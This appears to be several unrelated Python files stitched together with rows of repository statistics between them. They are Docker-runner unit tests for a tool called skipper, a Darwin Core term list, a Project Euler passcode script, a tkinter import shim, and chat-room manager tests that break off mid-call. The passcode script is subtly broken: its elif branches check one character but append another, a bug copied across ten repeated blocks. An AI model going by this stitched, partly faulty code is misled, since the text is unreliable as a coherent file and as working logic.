'-e', 'SKIPPER_UID=%(user_uid)s' % dict(user_uid=USER_ID),
'-e', 'HOME=%(homedir)s' % dict(homedir=HOME_DIR),
'-e', 'SKIPPER_DOCKER_GID=978',
'-v', get_volume_mapping('%(homedir)s/.netrc:%(homedir)s/.netrc:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('%(homedir)s/.gitconfig:%(homedir)s/.gitconfig:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('%(homedir)s/.docker/config.json:%(homedir)s/.docker/config.json:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('/etc/docker:/etc/docker:ro'),
'-v', get_volume_mapping('%(workdir)s:%(workdir)s:rw' % dict(workdir=WORKDIR)),
'-v', get_volume_mapping('/var/run/docker.sock:/var/run/docker.sock:rw'),
'-v', get_volume_mapping('entrypoint.sh:/opt/skipper/skipper-entrypoint.sh'),
'-v', get_volume_mapping('/var/lib/osmosis:/var/lib/osmosis:rw'),
'-w', PROJECT_DIR,
'--entrypoint', '/opt/skipper/skipper-entrypoint.sh',
FQDN_IMAGE,
' '.join(command)
]
popen_mock.assert_called_once_with(expected_nested_command)
@mock.patch('os.path.exists', mock.MagicMock(autospec=True, return_value=True))
@mock.patch('getpass.getuser', mock.MagicMock(autospec=True, return_value='testuser'))
@mock.patch('os.getcwd', mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
@mock.patch('os.path.expanduser', mock.MagicMock(autospec=True, return_value=HOME_DIR))
@mock.patch('os.getuid', autospec=True)
@mock.patch('grp.getgrnam', autospec=True)
@mock.patch('subprocess.Popen', autospec=False)
@mock.patch('subprocess.check_output', autospec=False)
@mock.patch('pkg_resources.resource_filename', autospec=False)
def test_run_complex_command_nested_with_env(self, resource_filename_mock, check_output_mock, popen_mock, grp_getgrnam_mock, os_getuid_mock):
resource_filename_mock.return_value = "entrypoint.sh"
check_output_mock.side_effect = [self.NET_LS, '']
popen_mock.return_value.stdout.readline.side_effect = ['aaa', 'bbb', 'ccc', '']
popen_mock.return_value.poll.return_value = -1
grp_getgrnam_mock.return_value.gr_gid = 978
os_getuid_mock.return_value = USER_ID
command = ['ls', '-l']
runner.run(command, FQDN_IMAGE, ENV, name="test")
expected_nested_command = [
'docker', 'run',
'--name',
'test',
'-t',
'-e', 'KEEP_CONTAINERS=True',
'--privileged',
'--net', get_default_net(),
'-e', 'KEY1=VAL1',
'-e', 'KEY2=VAL2',
'-e', 'SKIPPER_USERNAME=testuser',
'-e', 'SKIPPER_UID=%(user_uid)s' % dict(user_uid=USER_ID),
'-e', 'HOME=%(homedir)s' % dict(homedir=HOME_DIR),
'-e', 'SKIPPER_DOCKER_GID=978',
'-v', get_volume_mapping('%(homedir)s/.netrc:%(homedir)s/.netrc:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('%(homedir)s/.gitconfig:%(homedir)s/.gitconfig:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('%(homedir)s/.docker/config.json:%(homedir)s/.docker/config.json:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('/etc/docker:/etc/docker:ro'),
'-v', get_volume_mapping('%(workdir)s:%(workdir)s:rw' % dict(workdir=WORKDIR)),
'-v', get_volume_mapping('/var/run/docker.sock:/var/run/docker.sock:rw'),
'-v', get_volume_mapping('entrypoint.sh:/opt/skipper/skipper-entrypoint.sh'),
'-v', get_volume_mapping('/var/lib/osmosis:/var/lib/osmosis:rw'),
'-w', PROJECT_DIR,
'--entrypoint', '/opt/skipper/skipper-entrypoint.sh',
FQDN_IMAGE,
' '.join(command)
]
popen_mock.assert_called_once_with(expected_nested_command)
@mock.patch('getpass.getuser', mock.MagicMock(autospec=True, return_value='testuser'))
@mock.patch('os.getcwd', mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
@mock.patch('os.path.expanduser', mock.MagicMock(autospec=True, return_value=HOME_DIR))
@mock.patch('skipper.runner.utils.create_path_and_add_data', autospec=True)
@mock.patch('os.path.exists', autospec=True)
@mock.patch('os.getuid', autospec=True)
@mock.patch('grp.getgrnam', autospec=True)
@mock.patch('subprocess.Popen', autospec=False)
@mock.patch('subprocess.check_output', autospec=False)
@mock.patch('pkg_resources.resource_filename', autospec=False)
def test_run_complex_command_nested_with_special_case_verification(self, resource_filename_mock, check_output_mock,
popen_mock, grp_getgrnam_mock, os_getuid_mock,
path_exists_mock, create_path_and_add_data_mock):
path_exists_mock.return_value = False
resource_filename_mock.return_value = "entrypoint.sh"
check_output_mock.side_effect = [self.NET_LS, '']
popen_mock.return_value.stdout.readline.side_effect = ['aaa', 'bbb', 'ccc', '']
popen_mock.return_value.poll.return_value = -1
grp_getgrnam_mock.return_value.gr_gid = 978
os_getuid_mock.return_value = USER_ID
command = ['ls', '-l']
volumes = []
runner.run(command, FQDN_IMAGE, ENV, name="test", volumes=volumes)
expected_nested_command = [
'docker', 'run',
'--name',
'test',
'-t',
'-e', 'KEEP_CONTAINERS=True',
'--privileged',
'--net', get_default_net(),
'-e', 'KEY1=VAL1',
'-e', 'KEY2=VAL2',
'-e', 'SKIPPER_USERNAME=testuser',
'-e', 'SKIPPER_UID=%(user_uid)s' % dict(user_uid=USER_ID),
'-e', 'HOME=%(homedir)s' % dict(homedir=HOME_DIR),
'-e', 'SKIPPER_DOCKER_GID=978',
'-v', '%(homedir)s/.netrc:%(homedir)s/.netrc:ro' % dict(homedir=HOME_DIR),
'-v', '%(homedir)s/.gitconfig:%(homedir)s/.gitconfig:ro' % dict(homedir=HOME_DIR),
'-v', '%(homedir)s/.docker/config.json:%(homedir)s/.docker/config.json:ro' % dict(homedir=HOME_DIR),
'-v', '%(workdir)s:%(workdir)s:rw' % dict(workdir=WORKDIR),
'-v', '/var/run/docker.sock:/var/run/docker.sock:rw',
'-v', 'entrypoint.sh:/opt/skipper/skipper-entrypoint.sh',
'-w', PROJECT_DIR,
'--entrypoint', '/opt/skipper/skipper-entrypoint.sh',
FQDN_IMAGE,
' '.join(command)
]
calls = [mock.call(full_path="%(homedir)s/.docker/config.json" % dict(homedir=HOME_DIR),
data="{}", is_file=True),
mock.call(full_path="/home/adir/.gitconfig", data="", is_file=True)]
create_path_and_add_data_mock.assert_has_calls(calls, any_order=True)
popen_mock.assert_called_once_with(expected_nested_command)
def test_handle_volumes_bind_mount_with_bad_volume_mount(self):
docker_cmd = ['docker', 'run']
volumes = ['bad volume mount']
with self.assertRaises(ValueError):
runner.handle_volumes_bind_mount(docker_cmd, HOME_DIR, volumes, WORKDIR)
| 53.880952
| 145
| 0.621152
| 3,325
| 27,156
| 4.81594
| 0.05203
| 0.065946
| 0.056954
| 0.059452
| 0.926247
| 0.915881
| 0.908324
| 0.907263
| 0.904265
| 0.895835
| 0
| 0.005383
| 0.220099
| 27,156
| 503
| 146
| 53.988072
| 0.750696
| 0
| 0
| 0.805439
| 0
| 0.018828
| 0.263109
| 0.165562
| 0
| 0
| 0
| 0
| 0.027197
| 1
| 0.029289
| false
| 0.018828
| 0.014644
| 0
| 0.054393
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f6241736e9a9091965f110ad19a07fc9fa6bb9e7
| 8,093
|
py
|
Python
|
dwca/darwincore/terms.py
|
neilh-cogapp/python-dwca-reader
|
04120b80f33d632ac78284b57c153c4a5f574941
|
[
"BSD-3-Clause"
] | 30
|
2015-01-13T22:06:37.000Z
|
2022-02-06T18:45:45.000Z
|
dwca/darwincore/terms.py
|
neilh-cogapp/python-dwca-reader
|
04120b80f33d632ac78284b57c153c4a5f574941
|
[
"BSD-3-Clause"
] | 63
|
2015-01-12T14:16:55.000Z
|
2021-08-13T10:48:30.000Z
|
dwca/darwincore/terms.py
|
neilh-cogapp/python-dwca-reader
|
04120b80f33d632ac78284b57c153c4a5f574941
|
[
"BSD-3-Clause"
] | 22
|
2015-08-04T16:33:04.000Z
|
2021-05-25T20:26:07.000Z
|
TERMS = ['http://rs.tdwg.org/dwc/terms/occurrenceDetails', 'http://rs.tdwg.org/dwc/terms/highestBiostratigraphicZone', 'http://rs.tdwg.org/dwc/terms/associatedTaxa', 'http://rs.tdwg.org/dwc/terms/latestEpochOrHighestSeries', 'http://rs.tdwg.org/dwc/terms/informationWithheld', 'http://rs.tdwg.org/dwc/terms/minimumDistanceAboveSurfaceInMeters', 'http://rs.tdwg.org/dwc/terms/behavior', 'http://rs.tdwg.org/dwc/terms/verbatimLongitude', 'http://rs.tdwg.org/dwc/terms/countryCode', 'http://rs.tdwg.org/dwc/terms/associatedSequences', 'http://rs.tdwg.org/dwc/terms/habitat', 'http://rs.tdwg.org/dwc/terms/islandGroup', 'http://rs.tdwg.org/dwc/terms/nomenclaturalCode', 'http://purl.org/dc/terms/license', 'http://rs.tdwg.org/dwc/terms/earliestEonOrLowestEonothem', 'http://rs.tdwg.org/dwc/terms/year', 'http://rs.tdwg.org/dwc/terms/taxonID', 'http://rs.tdwg.org/dwc/terms/continent', 'http://rs.tdwg.org/dwc/terms/nameAccordingTo', 'http://rs.tdwg.org/dwc/terms/latestEraOrHighestErathem', 'http://rs.tdwg.org/dwc/terms/eventID', 'http://rs.tdwg.org/dwc/terms/nameAccordingToID', 'http://rs.tdwg.org/dwc/terms/decimalLongitude', 'http://rs.tdwg.org/dwc/terms/sampleSizeValue', 'http://rs.tdwg.org/dwc/terms/identifiedBy', 'http://rs.tdwg.org/dwc/terms/latestEonOrHighestEonothem', 'http://rs.tdwg.org/dwc/terms/catalogNumber', 'http://rs.tdwg.org/dwc/terms/eventRemarks', 'http://rs.tdwg.org/dwc/terms/taxonRank', 'http://rs.tdwg.org/dwc/terms/verbatimDepth', 'http://rs.tdwg.org/dwc/terms/originalNameUsageID', 'http://purl.org/dc/terms/rightsHolder', 'http://rs.tdwg.org/dwc/terms/lowestBiostratigraphicZone', 'http://purl.org/dc/terms/bibliographicCitation', 'http://rs.tdwg.org/dwc/terms/island', 'http://rs.tdwg.org/dwc/terms/associatedMedia', 'http://rs.tdwg.org/dwc/terms/group', 'http://rs.tdwg.org/dwc/terms/endDayOfYear', 'http://rs.tdwg.org/dwc/terms/individualCount', 'http://rs.tdwg.org/dwc/terms/occurrenceRemarks', 'http://rs.tdwg.org/dwc/terms/disposition', 'http://rs.tdwg.org/dwc/terms/collectionID', 'http://rs.tdwg.org/dwc/terms/sampleSizeUnit', 'http://rs.tdwg.org/dwc/terms/earliestPeriodOrLowestSystem', 'http://rs.tdwg.org/dwc/terms/county', 'http://rs.tdwg.org/dwc/terms/eventDate', 'http://rs.tdwg.org/dwc/terms/earliestEpochOrLowestSeries', 'http://rs.tdwg.org/dwc/terms/formation', 'http://rs.tdwg.org/dwc/terms/Taxon', 'http://purl.org/dc/terms/references', 'http://purl.org/dc/terms/language', 'http://rs.tdwg.org/dwc/terms/decimalLatitude', 'http://rs.tdwg.org/dwc/terms/startDayOfYear', 'http://rs.tdwg.org/dwc/terms/fieldNotes', 'http://rs.tdwg.org/dwc/terms/municipality', 'http://rs.tdwg.org/dwc/terms/namePublishedInYear', 'http://rs.tdwg.org/dwc/terms/associatedReferences', 'http://rs.tdwg.org/dwc/terms/georeferenceVerificationStatus', 'http://rs.tdwg.org/dwc/terms/datasetName', 'http://rs.tdwg.org/dwc/terms/locality', 'http://rs.tdwg.org/dwc/terms/identificationID', 'http://purl.org/dc/terms/type', 'http://rs.tdwg.org/dwc/terms/scientificNameID', 'http://rs.tdwg.org/dwc/terms/verbatimLatitude', 'http://rs.tdwg.org/dwc/terms/occurrenceID', 'http://rs.tdwg.org/dwc/terms/verbatimTaxonRank', 'http://rs.tdwg.org/dwc/terms/verbatimSRS', 'http://rs.tdwg.org/dwc/terms/order', 'http://rs.tdwg.org/dwc/terms/georeferenceProtocol', 'http://rs.tdwg.org/dwc/terms/locationAccordingTo', 'http://rs.tdwg.org/dwc/terms/originalNameUsage', 'http://rs.tdwg.org/dwc/terms/geodeticDatum', 'http://rs.tdwg.org/dwc/terms/Occurrence', 'http://rs.tdwg.org/dwc/terms/establishmentMeans', 'http://rs.tdwg.org/dwc/terms/parentNameUsage', 'http://rs.tdwg.org/dwc/terms/taxonRemarks', 'http://rs.tdwg.org/dwc/terms/footprintSRS', 'http://rs.tdwg.org/dwc/terms/collectionCode', 'http://rs.tdwg.org/dwc/terms/class', 'http://rs.tdwg.org/dwc/terms/family', 'http://rs.tdwg.org/dwc/terms/footprintWKT', 'http://rs.tdwg.org/dwc/terms/georeferenceRemarks', 'http://rs.tdwg.org/dwc/terms/lithostratigraphicTerms', 'http://rs.tdwg.org/dwc/terms/geologicalContextID', 'http://rs.tdwg.org/dwc/terms/dateIdentified', 'http://rs.tdwg.org/dwc/terms/higherGeographyID', 'http://rs.tdwg.org/dwc/terms/pointRadiusSpatialFit', 'http://rs.tdwg.org/dwc/terms/dynamicProperties', 'http://rs.tdwg.org/dwc/terms/verbatimLocality', 'http://purl.org/dc/terms/modified', 'http://rs.tdwg.org/dwc/terms/month', 'http://rs.tdwg.org/dwc/terms/earliestEraOrLowestErathem', 'http://rs.tdwg.org/dwc/terms/samplingProtocol', 'http://rs.tdwg.org/dwc/terms/infraspecificEpithet', 'http://rs.tdwg.org/dwc/terms/footprintSpatialFit', 'http://rs.tdwg.org/dwc/terms/namePublishedIn', 'http://rs.tdwg.org/dwc/terms/georeferenceSources', 'http://rs.tdwg.org/dwc/terms/identificationRemarks', 'http://rs.tdwg.org/dwc/terms/taxonConceptID', 'http://purl.org/dc/terms/accessRights', 'http://rs.tdwg.org/dwc/terms/lifeStage', 'http://rs.tdwg.org/dwc/terms/acceptedNameUsage', 'http://rs.tdwg.org/dwc/terms/verbatimEventDate', 'http://rs.tdwg.org/dwc/terms/typeStatus', 'http://rs.tdwg.org/dwc/terms/maximumDepthInMeters', 'http://rs.tdwg.org/dwc/terms/preparations', 'http://rs.tdwg.org/dwc/terms/georeferencedDate', 'http://rs.tdwg.org/dwc/terms/institutionID', 'http://rs.tdwg.org/dwc/terms/verbatimCoordinates', 'http://rs.tdwg.org/dwc/terms/vernacularName', 'http://rs.tdwg.org/dwc/terms/bed', 'http://rs.tdwg.org/dwc/terms/materialSampleID', 'http://rs.tdwg.org/dwc/terms/maximumElevationInMeters', 'http://purl.org/dc/terms/rights', 'http://rs.tdwg.org/dwc/terms/scientificName', 'http://rs.tdwg.org/dwc/terms/identificationReferences', 'http://rs.tdwg.org/dwc/terms/day', 'http://rs.tdwg.org/dwc/terms/fieldNumber', 'http://rs.tdwg.org/dwc/terms/parentNameUsageID', 'http://rs.tdwg.org/dwc/terms/acceptedNameUsageID', 'http://rs.tdwg.org/dwc/terms/identificationQualifier', 'http://rs.tdwg.org/dwc/terms/dataGeneralizations', 'http://rs.tdwg.org/dwc/terms/sex', 'http://rs.tdwg.org/dwc/terms/previousIdentifications', 'http://rs.tdwg.org/dwc/terms/georeferencedBy', 'http://rs.tdwg.org/dwc/terms/latestPeriodOrHighestSystem', 'http://rs.tdwg.org/dwc/terms/kingdom', 'http://rs.tdwg.org/dwc/terms/basisOfRecord', 'http://rs.tdwg.org/dwc/terms/institutionCode', 'http://rs.tdwg.org/dwc/terms/verbatimCoordinateSystem', 'http://rs.tdwg.org/dwc/terms/waterBody', 'http://rs.tdwg.org/dwc/terms/phylum', 'http://rs.tdwg.org/dwc/terms/ownerInstitutionCode', 'http://rs.tdwg.org/dwc/terms/latestAgeOrHighestStage', 'http://rs.tdwg.org/dwc/terms/occurrenceStatus', 'http://rs.tdwg.org/dwc/terms/higherClassification', 'http://purl.org/dc/terms/source', 'http://rs.tdwg.org/dwc/terms/recordedBy', 'http://rs.tdwg.org/dwc/terms/datasetID', 'http://rs.tdwg.org/dwc/terms/minimumElevationInMeters', 'http://rs.tdwg.org/dwc/terms/individualID', 'http://rs.tdwg.org/dwc/terms/samplingEffort', 'http://rs.tdwg.org/dwc/terms/Event', 'http://rs.tdwg.org/dwc/terms/member', 'http://rs.tdwg.org/dwc/terms/scientificNameAuthorship', 'http://rs.tdwg.org/dwc/terms/locationID', 'http://rs.tdwg.org/dwc/terms/higherGeography', 'http://rs.tdwg.org/dwc/terms/genus', 'http://rs.tdwg.org/dwc/terms/associatedOccurrences', 'http://rs.tdwg.org/dwc/terms/verbatimElevation', 'http://rs.tdwg.org/dwc/terms/maximumDistanceAboveSurfaceInMeters', 'http://rs.tdwg.org/dwc/terms/minimumDepthInMeters', 'http://rs.tdwg.org/dwc/terms/stateProvince', 'http://rs.tdwg.org/dwc/terms/nomenclaturalStatus', 'http://rs.tdwg.org/dwc/terms/taxonomicStatus', 'http://rs.tdwg.org/dwc/terms/specificEpithet', 'http://rs.tdwg.org/dwc/terms/parentEventID', 'http://rs.tdwg.org/dwc/terms/subgenus', 'http://rs.tdwg.org/dwc/terms/coordinatePrecision', 'http://rs.tdwg.org/dwc/terms/eventTime', 'http://rs.tdwg.org/dwc/terms/country', 'http://rs.tdwg.org/dwc/terms/coordinateUncertaintyInMeters', 'http://rs.tdwg.org/dwc/terms/identificationVerificationStatus', 'http://rs.tdwg.org/dwc/terms/otherCatalogNumbers', 'http://rs.tdwg.org/dwc/terms/earliestAgeOrLowestStage', 'http://rs.tdwg.org/dwc/terms/recordNumber', 'http://rs.tdwg.org/dwc/terms/reproductiveCondition', 'http://rs.tdwg.org/dwc/terms/locationRemarks', 'http://rs.tdwg.org/dwc/terms/namePublishedInID']
| 4,046.5
| 8,092
| 0.750154
| 1,174
| 8,093
| 5.17121
| 0.150767
| 0.157141
| 0.261901
| 0.340471
| 0.579641
| 0.549992
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021129
| 8,093
| 1
| 8,093
| 8,093
| 0.766347
| 0
| 0
| 0
| 0
| 0
| 0.915359
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
f63916f5f63866ab9b61ea738d5d02526728e7a1
| 4,208
|
py
|
Python
|
Problem 079 - Passcode Derivation.py
|
Deviloxide/Project-Euler
|
bc26bdd6d1efa90e5e7523e77764a32104534ef7
|
[
"MIT"
] | null | null | null |
Problem 079 - Passcode Derivation.py
|
Deviloxide/Project-Euler
|
bc26bdd6d1efa90e5e7523e77764a32104534ef7
|
[
"MIT"
] | null | null | null |
Problem 079 - Passcode Derivation.py
|
Deviloxide/Project-Euler
|
bc26bdd6d1efa90e5e7523e77764a32104534ef7
|
[
"MIT"
] | null | null | null |
def passcode_derivation(file):
text_file = open(file, "r")
lines = text_file.read().split()
b0 = []
b1 = []
b2 = []
b3 = []
b4 = []
b5 = []
b6 = []
b7 = []
b8 = []
b9 = []
for line in lines:
num_list = b0
num_str = "0"
if line[2] == num_str:
if line[0] not in num_list:
num_list.append(line[0])
if line[1] not in num_list:
num_list.append(line[1])
elif line[1] == num_str:
if line[1] not in num_list:
num_list.append(line[0])
num_list = b1
num_str = "1"
if line[2] == num_str:
if line[0] not in num_list:
num_list.append(line[0])
if line[1] not in num_list:
num_list.append(line[1])
elif line[1] == num_str:
if line[1] not in num_list:
num_list.append(line[0])
num_list = b2
num_str = "2"
if line[2] == num_str:
if line[0] not in num_list:
num_list.append(line[0])
if line[1] not in num_list:
num_list.append(line[1])
elif line[1] == num_str:
if line[1] not in num_list:
num_list.append(line[0])
num_list = b3
num_str = "3"
if line[2] == num_str:
if line[0] not in num_list:
num_list.append(line[0])
if line[1] not in num_list:
num_list.append(line[1])
elif line[1] == num_str:
if line[1] not in num_list:
num_list.append(line[0])
num_list = b4
num_str = "4"
if line[2] == num_str:
if line[0] not in num_list:
num_list.append(line[0])
if line[1] not in num_list:
num_list.append(line[1])
elif line[1] == num_str:
if line[1] not in num_list:
num_list.append(line[0])
num_list = b5
num_str = "5"
if line[2] == num_str:
if line[0] not in num_list:
num_list.append(line[0])
if line[1] not in num_list:
num_list.append(line[1])
elif line[1] == num_str:
if line[1] not in num_list:
num_list.append(line[0])
num_list = b6
num_str = "6"
if line[2] == num_str:
if line[0] not in num_list:
num_list.append(line[0])
if line[1] not in num_list:
num_list.append(line[1])
elif line[1] == num_str:
if line[1] not in num_list:
num_list.append(line[0])
num_list = b7
num_str = "7"
if line[2] == num_str:
if line[0] not in num_list:
num_list.append(line[0])
if line[1] not in num_list:
num_list.append(line[1])
elif line[1] == num_str:
if line[1] not in num_list:
num_list.append(line[0])
num_list = b8
num_str = "8"
if line[2] == num_str:
if line[0] not in num_list:
num_list.append(line[0])
if line[1] not in num_list:
num_list.append(line[1])
elif line[1] == num_str:
if line[1] not in num_list:
num_list.append(line[0])
num_list = b9
num_str = "9"
if line[2] == num_str:
if line[0] not in num_list:
num_list.append(line[0])
if line[1] not in num_list:
num_list.append(line[1])
elif line[1] == num_str:
if line[1] not in num_list:
num_list.append(line[0])
super_list = [b0, b1, b2, b3, b4, b5, b6, b7, b8, b9]
count = 0
order = {}
for i_list in super_list:
order[count] = len(set(i_list))
count += 1
return sorted(order, key=order.get)
print(passcode_derivation("Additional Files\p079_keylog.txt"))
| 28.053333
| 63
| 0.456749
| 591
| 4,208
| 3.067682
| 0.094755
| 0.27027
| 0.132377
| 0.198566
| 0.823497
| 0.823497
| 0.823497
| 0.823497
| 0.823497
| 0.823497
| 0
| 0.052345
| 0.43251
| 4,208
| 149
| 64
| 28.241611
| 0.706868
| 0
| 0
| 0.655738
| 0
| 0
| 0.010594
| 0.005174
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008197
| false
| 0.016393
| 0
| 0
| 0.016393
| 0.008197
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
140a307831c5f4fa4a38f9a49a9405a449f927f7
| 99
|
py
|
Python
|
memtkinter/scrolledtext.py
|
JamesGKent/memtkinter
|
c4e178b33f24e609c812b20bddfff7448782a192
|
[
"MIT"
] | null | null | null |
memtkinter/scrolledtext.py
|
JamesGKent/memtkinter
|
c4e178b33f24e609c812b20bddfff7448782a192
|
[
"MIT"
] | 3
|
2018-06-04T09:32:20.000Z
|
2018-06-07T15:27:56.000Z
|
memtkinter/scrolledtext.py
|
JamesGKent/memtkinter
|
c4e178b33f24e609c812b20bddfff7448782a192
|
[
"MIT"
] | null | null | null |
try:
from tkinter.scrolledtext import *
except ImportError:
from Tkinter.ScrolledText import *
| 24.75
| 36
| 0.787879
| 11
| 99
| 7.090909
| 0.636364
| 0.282051
| 0.589744
| 0.74359
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 99
| 4
| 37
| 24.75
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1aed2562a4074d14712b800caff0fa411f442acb
| 10,192
|
py
|
Python
|
test/db/test_room_manager.py
|
thenetcircle/dino
|
1047c3458e91a1b4189e9f48f1393b3a68a935b3
|
[
"Apache-2.0"
] | 150
|
2016-10-05T11:09:36.000Z
|
2022-03-06T16:24:41.000Z
|
test/db/test_room_manager.py
|
thenetcircle/dino
|
1047c3458e91a1b4189e9f48f1393b3a68a935b3
|
[
"Apache-2.0"
] | 27
|
2017-03-02T03:37:02.000Z
|
2022-02-10T04:59:54.000Z
|
test/db/test_room_manager.py
|
thenetcircle/dino
|
1047c3458e91a1b4189e9f48f1393b3a68a935b3
|
[
"Apache-2.0"
] | 21
|
2016-11-11T07:51:48.000Z
|
2020-04-26T21:38:33.000Z
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dino.db.manager.rooms import RoomManager
from dino.exceptions import NoSuchChannelException
from dino.exceptions import NoSuchRoomException
from uuid import uuid4 as uuid
from test.db import BaseDatabaseTest
__author__ = 'Oscar Eriksson <oscar.eriks@gmail.com>'
class RoomManagerTest(BaseDatabaseTest):
_act = None
@staticmethod
def _publish(activity: dict, external: bool=False) -> None:
RoomManagerTest._act = activity
def setUp(self):
self.set_up_env('redis')
self.env.publish = RoomManagerTest._publish
self._act = None
self.env.db = self.db
self.manager = RoomManager(self.env)
def tearDown(self):
self.db.redis.flushall()
self.env.cache._flushall()
def test_get_rooms_before_channel_creation(self):
rooms = self.manager.get_rooms(BaseDatabaseTest.CHANNEL_ID)
self.assertEqual(0, len(rooms))
def test_get_rooms_before_room_creation(self):
self._create_channel()
rooms = self.manager.get_rooms(BaseDatabaseTest.CHANNEL_ID)
self.assertEqual(0, len(rooms))
def test_get_rooms_after_create(self):
self._create_channel()
self._create_room()
rooms = self.manager.get_rooms(BaseDatabaseTest.CHANNEL_ID)
self.assertEqual(1, len(rooms))
self.assertEqual(BaseDatabaseTest.ROOM_ID, rooms[0]['uuid'])
self.assertEqual(BaseDatabaseTest.ROOM_NAME, rooms[0]['name'])
def test_create_room(self):
self._create_channel()
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
value = self.manager.create_room(
BaseDatabaseTest.ROOM_NAME, BaseDatabaseTest.ROOM_ID,
BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.USER_ID)
self.assertIsNone(value)
self.assertTrue(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
def test_create_room_empty_room_name(self):
self._create_channel()
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
value = self.manager.create_room(
'', BaseDatabaseTest.ROOM_ID,
BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.USER_ID)
self.assertIsNotNone(value)
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
def test_create_room_empty_room_id(self):
self._create_channel()
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
value = self.manager.create_room(
BaseDatabaseTest.ROOM_NAME, '',
BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.USER_ID)
self.assertIsNotNone(value)
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
def test_create_room_empty_channel_id(self):
self._create_channel()
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
value = self.manager.create_room(
BaseDatabaseTest.ROOM_NAME, BaseDatabaseTest.ROOM_ID,
'', BaseDatabaseTest.USER_ID)
self.assertIsNotNone(value)
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
def test_create_room_empty_user_id(self):
self._create_channel()
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
value = self.manager.create_room(
BaseDatabaseTest.ROOM_NAME, BaseDatabaseTest.ROOM_ID,
BaseDatabaseTest.CHANNEL_ID, '')
self.assertIsNotNone(value)
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
def test_remove_room(self):
self._create_channel()
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
self.manager.create_room(
BaseDatabaseTest.ROOM_NAME, BaseDatabaseTest.ROOM_ID,
BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.USER_ID)
self.assertTrue(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
self.manager.remove_room(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID)
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
def test_remove_room_twice(self):
self._create_channel()
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
self.manager.create_room(
BaseDatabaseTest.ROOM_NAME, BaseDatabaseTest.ROOM_ID,
BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.USER_ID)
self.assertTrue(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
self.manager.remove_room(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID)
self.assertRaises(
